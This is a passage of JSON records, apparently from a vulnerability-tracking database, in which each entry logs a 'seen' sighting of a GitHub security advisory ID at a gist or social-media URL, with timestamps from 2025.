"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "c9d4f176-c7b9-43f1-955b-a0033bf4b77b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "4304e66c-e6f5-422f-9b39-9c2522ed495f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "f95c7dbf-a612-4b45-bc53-975dbf5c73f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjm2-4hf7-9x65", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114627032781451562", "content": "", "creation_timestamp": "2025-06-04T20:41:55.050565Z"}, {"uuid": "ca9f6c88-315e-4ccd-99dd-240bb779ef04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rvwf-54qp-4r6v", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "ac2a630b-c243-4715-848f-2637f3fd679f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhhw-99gj-p3c3", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "588d9591-37b1-4115-b31c-41e2e6423076", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "8fe8ccec-56e3-410d-b62c-225715e07f1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "e6480977-81fd-49d5-abe4-f21c17d0ba82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "b3a1d0fd-7865-4319-a8c2-820d2bd8c927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "b90205f8-1543-48d5-a4a0-241ccf86f3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "f294d73c-3378-45d1-9524-18ad96fc3535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/64c869407f72779632d4e37261089424", "content": "", "creation_timestamp": "2025-07-16T12:38:05.000000Z"}, {"uuid": "cd7ada93-9998-4036-af54-0caadabcd94a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33p9-3p43-82vq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114627177064435003", "content": "", "creation_timestamp": "2025-06-04T21:18:36.438478Z"}, {"uuid": "3e76641e-6848-4014-ab7b-a030b52a37da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/b89100a84a2501ca73d8628777140fed", "content": "", "creation_timestamp": "2025-07-16T03:28:12.000000Z"}, {"uuid": "c604f39c-36b1-4117-ad9c-7811b865360b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "e5939698-69d9-40ad-a123-1338998eca03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqq-5vrc-xw9h", "type": "seen", "source": "https://gist.github.com/safer-bot/ef60ba5b8082b173c2019a18ade46e96", "content": "", "creation_timestamp": "2025-07-16T08:23:40.000000Z"}, {"uuid": "64e40073-b7c4-4da2-87db-cb5314ab593f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "a6219f08-3154-4643-a6d5-fbb49dcb97bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98wm-3w3q-mw94", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "c01c7905-b53b-4f87-a2e6-fdeb225a8c57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "23ac632e-5f1b-4f21-a8d2-a1dfd5f7ec5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "f1355ae1-c5f5-45ff-8431-dc16fe499746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8x27-jwjr-8545", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114433867704399481", "content": "", "creation_timestamp": "2025-05-01T17:57:29.840447Z"}, {"uuid": "f6f30441-53f0-4cc0-a3fe-45d58736a81e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j342-m5hw-rr3v", "type": "seen", "source": "https://gist.github.com/EliahKagan/c847476c5a1c15dac03b1ce9a010d2a1", "content": "", "creation_timestamp": "2025-05-01T23:25:44.000000Z"}, {"uuid": "e5cca0f2-0ef1-4910-99a3-9dcb31a53364", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mgvv-9p9g-3jv4", "type": "seen", "source": "https://gist.github.com/EliahKagan/c847476c5a1c15dac03b1ce9a010d2a1", "content": "", "creation_timestamp": "2025-05-01T23:25:44.000000Z"}, {"uuid": "9fd5a49e-05ad-44af-bced-a3afe5a20f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vw2c-22j4-2fh2", "type": "seen", "source": "https://gist.github.com/EliahKagan/c847476c5a1c15dac03b1ce9a010d2a1", "content": "", "creation_timestamp": "2025-05-01T23:25:44.000000Z"}, {"uuid": "6e23c560-0adb-4674-bd25-e88fbc238c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4r9-r8fh-9vj2", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "81245b7c-f6f1-4dad-bce2-cc84f21e1195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/c2216b5d3e2d6726f802333827d83269", "content": "", "creation_timestamp": "2025-07-16T03:26:38.000000Z"}, {"uuid": "32a4643b-6fbb-4890-bc1d-587c2429de64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jc7g-x28f-3v3h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114654489485948868", "content": "", "creation_timestamp": "2025-06-09T17:04:30.684513Z"}, {"uuid": "a39df757-bd1f-4388-9fb4-051b985df7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f9p8-gjr4-j9gx", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/258", "content": "", "creation_timestamp": "2025-06-17T11:22:14.000000Z"}, {"uuid": "1c6b2f6c-e422-4051-944a-21bfe2dcc4dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3ls3te744yuq2", "content": "", "creation_timestamp": "2025-06-21T05:34:22.381464Z"}, {"uuid": "271cbee6-be47-4af5-8041-8a823da76392", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/72f995b8cd1384d5441af0330c518fe4", "content": "", "creation_timestamp": "2025-07-16T03:36:23.000000Z"}, {"uuid": "d65f1263-d4dc-4f43-90a4-5219e5670cf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3ltj7m55gc42e", "content": "", "creation_timestamp": "2025-07-09T06:43:16.681325Z"}, {"uuid": "4d5614c7-f445-4c4e-996c-c02510ec89e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/72f995b8cd1384d5441af0330c518fe4", "content": "", "creation_timestamp": "2025-07-16T03:36:23.000000Z"}, {"uuid": "621bf938-0b59-4bee-a484-0a70b2c2a19f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/72f995b8cd1384d5441af0330c518fe4", "content": "", "creation_timestamp": "2025-07-16T03:36:23.000000Z"}, {"uuid": "7fc0af75-8025-44d3-be91-798f743201aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/72f995b8cd1384d5441af0330c518fe4", "content": "", "creation_timestamp": "2025-07-16T03:36:23.000000Z"}, {"uuid": "b6f5e9c4-337d-4834-b405-62436bab26ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/72f995b8cd1384d5441af0330c518fe4", "content": "", "creation_timestamp": "2025-07-16T03:36:23.000000Z"}, {"uuid": "17b7a9e8-e597-43e2-a5cb-f80f61ca4372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "e287ae57-0c42-443e-a76d-dbaed9c753b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "08cb2fa2-8663-44a0-a4a2-3e95001a9d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "a712670a-e52b-43ba-8663-3b508068b509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw85-4gmf-m7rh", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "e676a0e7-e9d5-4319-bba8-bc27ede61996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "6dda4125-4f67-4376-af4e-8a7b2b5bdb8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "879cc1f8-4555-43f1-bb22-c5a826d0e02d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "43068931-8e4e-4669-b34c-adf73083357e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "27a6442c-b4c1-4a3d-a62d-bc3e6aad6274", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "05b28265-f0e1-49fc-8bee-2b23bfd2d717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fmj5-wv96-r2ch", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "a672c887-5349-4954-8132-30b2e5d28e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "72638cad-baad-4f3c-a4d2-2e51390f02de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh5-3ghh-wfjx", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "9d87e295-66a7-4b7e-863e-6f263b0686d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "2071b0a3-28a6-4470-b0b5-f8012fd4ceeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x83-r56g-cv47", "type": "seen", "source": "https://gist.github.com/safer-bot/2d5f96fb1f5118b0adf472cee7a0dff8", "content": "", "creation_timestamp": "2025-07-16T03:39:54.000000Z"}, {"uuid": "f1df252b-bcfa-4e13-855c-44206beaf7b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/24f3516de0b1b7dccb1042811e161cff", "content": "", "creation_timestamp": "2025-07-16T08:24:47.000000Z"}, {"uuid": "e5614f13-f393-4ae6-a848-d4a187d53919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/1311a1d6fbeee3ebfc44b603cc3c1e8e", "content": "", "creation_timestamp": "2025-07-16T03:41:01.000000Z"}, {"uuid": "588e353c-3ec5-49f9-b7de-b4dc41ef080a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pvp8-3xj6-8c6x", "type": "seen", "source": "https://gist.github.com/safer-bot/81646bffe43cd1a56382b27f8a74e4d7", "content": "", "creation_timestamp": "2025-07-16T08:26:59.000000Z"}, {"uuid": "a7b2aca1-feaf-4b9e-82d3-bb4b6be666f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/571725a31b8cdc4bc529181b4e230f9b", "content": "", "creation_timestamp": "2025-07-16T08:26:27.000000Z"}, {"uuid": "d90b2186-12fd-4a26-9188-fe025089a36c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "22110700-9c53-466a-9afe-1c50d29a4594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "a97ea753-924d-4d9d-bbdb-b84950eaa401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/2e68c14ecc155d87c9c5c84c2135887e", "content": "", "creation_timestamp": "2025-07-16T10:18:29.000000Z"}, {"uuid": "6d58f96d-6b07-4c65-890f-23d88ec50cf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/1311a1d6fbeee3ebfc44b603cc3c1e8e", "content": "", "creation_timestamp": "2025-07-16T03:41:01.000000Z"}, {"uuid": "1a49797a-629b-4b68-af85-ac38f2c44574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/571725a31b8cdc4bc529181b4e230f9b", "content": "", "creation_timestamp": "2025-07-16T08:26:27.000000Z"}, {"uuid": "5074f599-47b6-4b35-ba4e-60e2022aa5d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/229e4501237d89dacff9852ebc17d8ec", "content": "", "creation_timestamp": "2025-07-16T12:36:59.000000Z"}, {"uuid": "09203338-5791-4ef8-a008-9a21075c26bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "4fd194bb-6ab0-4288-98e2-4ad849a2c83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvpg-vgmx-xg6w", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "d7762aa9-4b02-4a74-92c0-0eb1b066b7a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5f9v-mv5g-jh5q", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "89e44c16-6fa3-4468-9b8c-840a147cf668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "fe3738c6-df0a-42e8-a2fd-5eb4887abf23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vv7r-c36w-3prj", "type": "seen", "source": "https://gist.github.com/safer-bot/f6680196cf1b0aee1c5fa9abea2ce0e1", "content": "", "creation_timestamp": "2025-07-16T03:54:14.000000Z"}, {"uuid": "bb1781a8-8ed3-4021-a8a1-3f5db34ab91d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9pcc-gvx5-r5wm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114462007419812570", "content": "", "creation_timestamp": "2025-05-06T17:13:47.596775Z"}, {"uuid": "d887ec18-8c9a-4ed8-8b20-de6d4833cdd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "c66f7ee8-a8ad-428e-99ee-45a5333f771c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/78e5bb708700bd263e6fee3dfd3593c6", "content": "", "creation_timestamp": "2025-07-16T10:17:30.000000Z"}, {"uuid": "51931e6b-2f64-45eb-85b6-a8bbe08f32fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/229e4501237d89dacff9852ebc17d8ec", "content": "", "creation_timestamp": "2025-07-16T12:36:59.000000Z"}, {"uuid": "28710637-dfc6-4b1f-87e6-7fcbdf18d696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/229e4501237d89dacff9852ebc17d8ec", "content": "", "creation_timestamp": "2025-07-16T12:36:59.000000Z"}, {"uuid": "192522bc-9902-4dd8-bd2e-6913c321f051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "f16c9d93-e428-47c9-9f42-6f2a5a0eb32c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 